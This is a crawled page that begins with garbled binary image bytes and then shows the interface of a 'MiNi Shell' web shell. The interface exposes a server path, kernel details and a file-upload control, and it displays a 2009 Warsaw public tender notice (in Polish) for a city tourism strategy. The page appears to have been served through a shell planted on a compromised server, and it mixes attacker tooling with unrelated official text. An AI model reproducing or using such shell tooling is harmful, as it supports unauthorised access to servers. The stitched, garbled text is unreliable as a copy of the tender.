JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090922/328212-N-2009.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentu Strategii Rozwoju Turystyki m.st. Warszawy do 2020 r</b><br>
<b>Numer ogłoszenia: 328212 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa , Pl. Bankowy 3/5, 00-950 Warszawa, woj. mazowieckie, tel. (+48 22) 443 14 00, faks (+48 22) 443 14 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.warszawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie ma zamiaru ustanowienia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentu Strategii Rozwoju Turystyki m.st. Warszawy do 2020 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentu Strategii Rozwoju Turystyki m.st. Warszawy do 2020 r. 
Dokument powinien zawierać: 
Część diagnostyczną - audyt turystyczny 
Część programową - strategię rozwoju turystyki 
Część wdrożeniową - plan operacyjny 
Dokument powinien być opracowany metodą ekspercko-partycypacyjną tak, aby Wykonawca zapewnił udział głównych interesariuszy turystyki w Warszawie, w tym branży turystycznej. 
Zakres opracowania części programowej powinien obejmować co najmniej: zintegrowaną ofertę turystyczną wraz z architekturą marki i koncepcją produktów, infrastrukturę turystyczną Miasta, sposób zarządzania turystyką w Mieście oraz założenia koncepcji marketingowej i sprzedaż oferty turystycznej. 
2. Wykonawca dla prawidłowego wykonania opracowania powinien zapewnić: 
a) właściwe zarządzanie projektem opracowania dokumentu, 
b) przeprowadzenie niezbędnych badań uzupełniających, zarówno uczestników branży turystycznej, jak również odbiorców oferty, 
c) udział głównych interesariuszy w procesie tworzenia dokumentu, 
d) konsultację społeczną projektu dokumentu, 
e) spójność opracowania z innymi dokumentami wewnętrznymi Miasta oraz zewnętrznymi, 
f) skuteczną komunikację wewnętrzną i zewnętrzną w okresie do przyjęcia dokumentu przez Radę Miasta Stołecznego Warszawy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Postępowanie prowadzone jest z zachowaniem zasad określonych ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t. jedn. Dz. U. z 2007r. Nr 223, poz. 1655 ze zm.) zwaną dalej ustawą. 
1. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
a) spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy; 
b) wykażą, iż w okresie ostatnich 3 lat przed dniem wszczęcia postępowania należycie wykonali co najmniej 1 zamówienie dotyczące strategii rozwoju turystyki miasta o liczbie mieszkańców nie mniejszej niż 200 000 i o wartości nie mniejszej niż 70 000 zł brutto w ramach jednego zamówienia lub strategii rozwoju turystyki dla regionu obejmującego co najmniej jedną aglomerację miejską o liczbie mieszkańców nie mniejszej niż 200 000 i o wartości nie mniejszej niż 100 000 zł brutto w ramach jednego zamówienia; 
c) dysponują lub będą dysponować co najmniej siedmioosobowym zespołem spełniającym poniższe wymagania: 
1) Kierownik projektu - doświadczenie w kierowaniu co najmniej 3 projektami w zakresie opracowania strategii na poziomie miasta lub gminy lub powiatu lub województwa lub kraju, z udziałem w każdym z nich co najmniej 15 interesariuszy instytucjonalnych, wykonywanymi w ciągu ostatnich 5 lat, w tym co najmniej 1 w zakresie turystyki, których wartość wynosiła co najmniej 70 000 zł brutto w ramach jednego zamówienia. Przyjmuje się, że interesariuszem instytucjonalnym jest instytucja lub firma, która może, lub z uwagi na charakter projektu, powinna brać w nim udział. Interesariusze instytucjonalni mogą pośrednio lub bezpośrednio oraz pozytywnie lub negatywnie wpływać lub być pod wpływem procesu tworzenia i/lub rezultatów programowanej strategii.
2) Dwóch ekspertów ds. kreowania produktów turystycznych - doświadczenie w opracowaniu co najmniej trzech projektów w zakresie kreacji produktów turystyki miejskiej i kulturowej, wykonywanych w ciągu ostatnich 5 lat, których wartość wynosiła co najmniej 30 000 zł brutto w ramach jednego zamówienia; 
3) Ekspert ds. badań - doświadczenie w prowadzeniu co najmniej pięciu badań, obejmujących prowadzenie pogłębionych analiz statystycznych i interpretacji danych ilościowych oraz wykonywaniu analizy wyników badań, zakończonych wnioskami. Co najmniej trzy badania muszą dotyczyć turystyki; 
4) Ekspert ds. zarządzania turystyką - doświadczenie w kierowaniu wdrażaniem co najmniej trzech projektów turystycznych na poziomie miejskim lub regionalnym, uzyskane w okresie ostatnich 5 lat; 
5) Ekspert ds. marketingu turystycznego - doświadczenie w opracowaniu co najmniej 8 marek turystycznych, uzyskane w okresie ostatnich 5 lat; 
6) Ekspert ds. komunikacji społecznej - doświadczenie w opracowaniu co najmniej trzech planów komunikacji w projektach obejmujących konsultacje społeczne, uzyskane w okresie ostatnich 5 lat. 
2. Złożenie przez Wykonawcę wraz z wnioskiem dokumentów, wykazów i oświadczeń wymienionych w niniejszym ogłoszeniu będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający sprawdzi z ich treści czy Wykonawca spełnia wszystkie ww. warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3. Wykonawcy ubiegający się o zamówienie muszą złożyć następujące dokumenty i oświadczenia: 
a) wypełniony formularz wniosku o dopuszczenie do udziału w postępowaniu, w którym Wykonawca oświadcza, iż spełnienia warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, a w szczególności w ogłoszeniu o zamówieniu; 
b) dokument potwierdzający dopuszczenie Wykonawcy do obrotu prawnego - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków; 
c) wykaz (Nr 1) wykonanych należycie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania zamówień dotyczących strategii rozwoju turystyki miasta o liczbie mieszkańców nie mniejszej niż 200 000 i o wartości nie mniejszej niż 70 000 zł brutto w ramach jednego zamówienia lub strategii rozwoju turystyki dla regionu obejmującego co najmniej jedną aglomerację miejską o liczbie mieszkańców nie mniejszej niż 200 000 i o wartości nie mniejszej niż 100 000 zł brutto w ramach jednego zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców; 
d) dokumenty (np. referencje) potwierdzające, że usługi wyszczególnione w Wykazie Nr 1 zostały wykonane należycie; 
e) wykaz (Nr 2) osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wymienionych w pkt 1 lit. c); 
f) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w Wykazie Nr 2 Wykonawca wskazał osoby, którymi nie dysponuje a dopiero będzie dysponował. 
g) w przypadku gdy na doświadczenie Wykonawcy wymienione w Wykazie Nr 1 lub osób wymienionych w Wykazie Nr 2 składają się zamówienia, których wartość w umowie została wyrażona w innej walucie niż zł polski, wartość ta zostanie przeliczona po średnim kursie walut obcych ogłoszonym przez NBP na dzień wszczęcia postepowania, czyli zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych Urzędu Zamówień Publicznych. 
4. Wzory formularzy wniosku i wykazów można pobrać ze strony internetowej: http://ogloszeniabzp.um.warszawa.pl/wyszukiwarka.php, jak również uzyskać w siedzibie Biura Zamówień Publicznych Urzędu m. st. Warszawy, przy ul. Senatorskiej 36, 00-095 Warszawa, piętro IV, pokój nr 17, u Pani Ewy Górskiej (tel.: 22 443-14-14), w godz.: 8.00÷16.00 oraz otrzymać pocztą lub faksem na wniosek Wykonawcy na nr faksu: 22 443-14-02. 
5. Wykonawca zagraniczny 
5.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt 3. lit. b), składa dokument lub dokumenty wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania wniosków. 
5.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o którym mowa w pkt. 5.1. oraz w pkt. 3. lit. b), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania wniosków. 
6. Zamawiający dopuszcza możliwość składania wniosku przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że taki wniosek spełniać będzie następujące wymagania: 
6.1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. 
6.2. Pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza) powinno być załączone do wniosku i zawierać w szczególności wskazanie: 
a) postępowania o zamówienie publiczne, którego dotyczy, 
b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, 
c) ustanowionego Pełnomocnika oraz zakresu jego umocowania. 
6.3. Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
6.4. Stosowne odpisy z rejestru bądź ewidencji (pkt 3. lit b) muszą zostać dołączone do wniosku dla wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. 
6.5. W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 1, 2 i 3 Ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców (suma wymagań określonych przez Zamawiającego w tym zakresie). 
6.6. Oświadczenia, formularze, dokumenty składa i podpisuje w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających wniosek wspólny. 
6.7. Wszystkie kserokopie dokumentów załączone do wniosku muszą być opisane za zgodność z oryginałem i podpisane przez Pełnomocnika lub wszystkich Wykonawców. 
6.8. Wszelka korespondencja oraz rozliczenia dokonywane będą przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu wniosku. 
7. Wymogi formalne dotyczące składanych dokumentów 
a) wniosek, wykaz oraz oświadczenie - pod rygorem uznania za nieważne - muszą zostać sporządzone w języku polskim z zachowaniem formy pisemnej np.: na maszynie do pisania, komputerze lub ręcznie długopisem czytelnym pismem oraz podpisane przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej; 
b) w przypadku, gdy Wykonawcę reprezentuje Pełnomocnik do wniosku musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza; 
c) pozostałe oświadczenia i dokumenty należy załączyć w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub właściwą(e) osobę(-y) upoważnioną(-e) do reprezentacji danego Wykonawcy w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem) 
d) Dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
8. Zamawiający zaprosi do dialogu Wykonawców spełniających warunki udziału w postępowaniu w liczbie nie większej niż 5. W przypadku, gdy więcej niż 5 Wykonawców spełni warunki udziału w postępowaniu zawarte w niniejszym ogłoszeniu, Zamawiający zaprosi do złożenia oferty tych 5 z nich, którzy uzyskają najwyższą liczbę punktów z tytułu wiedzy i doświadczenia, wyliczonych w następujący sposób: 
a) 10 punktów - za każde zamówienie wykazane w Wykazie Nr 1; 
b) 1 punkt - za każde zamówienie wykazane w Wykazie Nr 3; 
W celu uzyskania dodatkowych punktów w kryterium kwalifikacyjnym wymienionym w lit. b), Wykonawca może złożyć wykaz (Nr 3) należycie wykonanych zamówień w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, dla miasta lub gminy lub powiatu lub województwa lub kraju o wartości nie mniejszej niż 70 000 zł brutto w ramach jednego zamówienia, dotyczących: strategii rozwoju turystyki lub ogólnej strategii rozwoju lub strategii promocji turystyki lub marki turystycznej lub strategii produktu turystycznego. Do wykazu należy dołączyć dokumenty (np. referencje) potwierdzające, że usługi wyszczególnione w Wykazie Nr 3 zostały wykonane należycie. W Wykazie Nr 3 nie można wykazywać zamówień wykazanych w Wykazie Nr 1!
W przypadku gdy na doświadczenie Wykonawcy wymienione w Wykazie Nr 3 składają się zamówienia, których wartość w umowie została wyrażona w innej walucie niż zł polski, wartość ta zostanie przeliczona po średnim kursie walut obcych ogłoszonym przez NBP na dzień wszczęcia postepowania, czyli zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych Urzędu Zamówień Publicznych. 
c) w przypadku uzyskania jednakowej ilości punktów decydować będzie łączna wartość wykazanych zamówień z Wykazu nr 1..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Metodologia i sposób realizacji zadań merytorycznych - 40</li>
<li>3 - Metodologia i sposób realizacji zadań organizacyjnych - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia bedzie doręczona wykonawcom zaproszonym do składania ofert, zakwlifikowanym i zaproszonym do dialogu.</p>
<p><b>IV.3.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Opis potrzeb i wymagań Zamawiającego można pobrać ze strony internetowej: http://ogloszeniabzp.um.warszawa.pl/wyszukiwarka.php , jak również uzyskać w siedzibie Biura Zamówień Publicznych Urzędu m. st. Warszawy, przy ul. Senatorskiej 36, 00-095 Warszawa, piętro IV, pokój nr 17, u Pani Ewy Górskiej (tel.: 22 443-14-14) w godz.: 8.00÷16.00 oraz otrzymać pocztą lub faksem na wniosek Wykonawcy na nr faksu: 22 443-14-02.</p><p><b>IV.3.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród dla Wykonawców, którzy podczas dialogu przedstawią rozwiązania stanowiące podstawę do składania ofert.</p><p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 12:00, miejsce: w siedzibie Biura Zamówień Publicznych Urzędu m. st. Warszawy, ul. Senatorska 36, 00-095 Warszawa, w pok. nr 17,  IV p.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com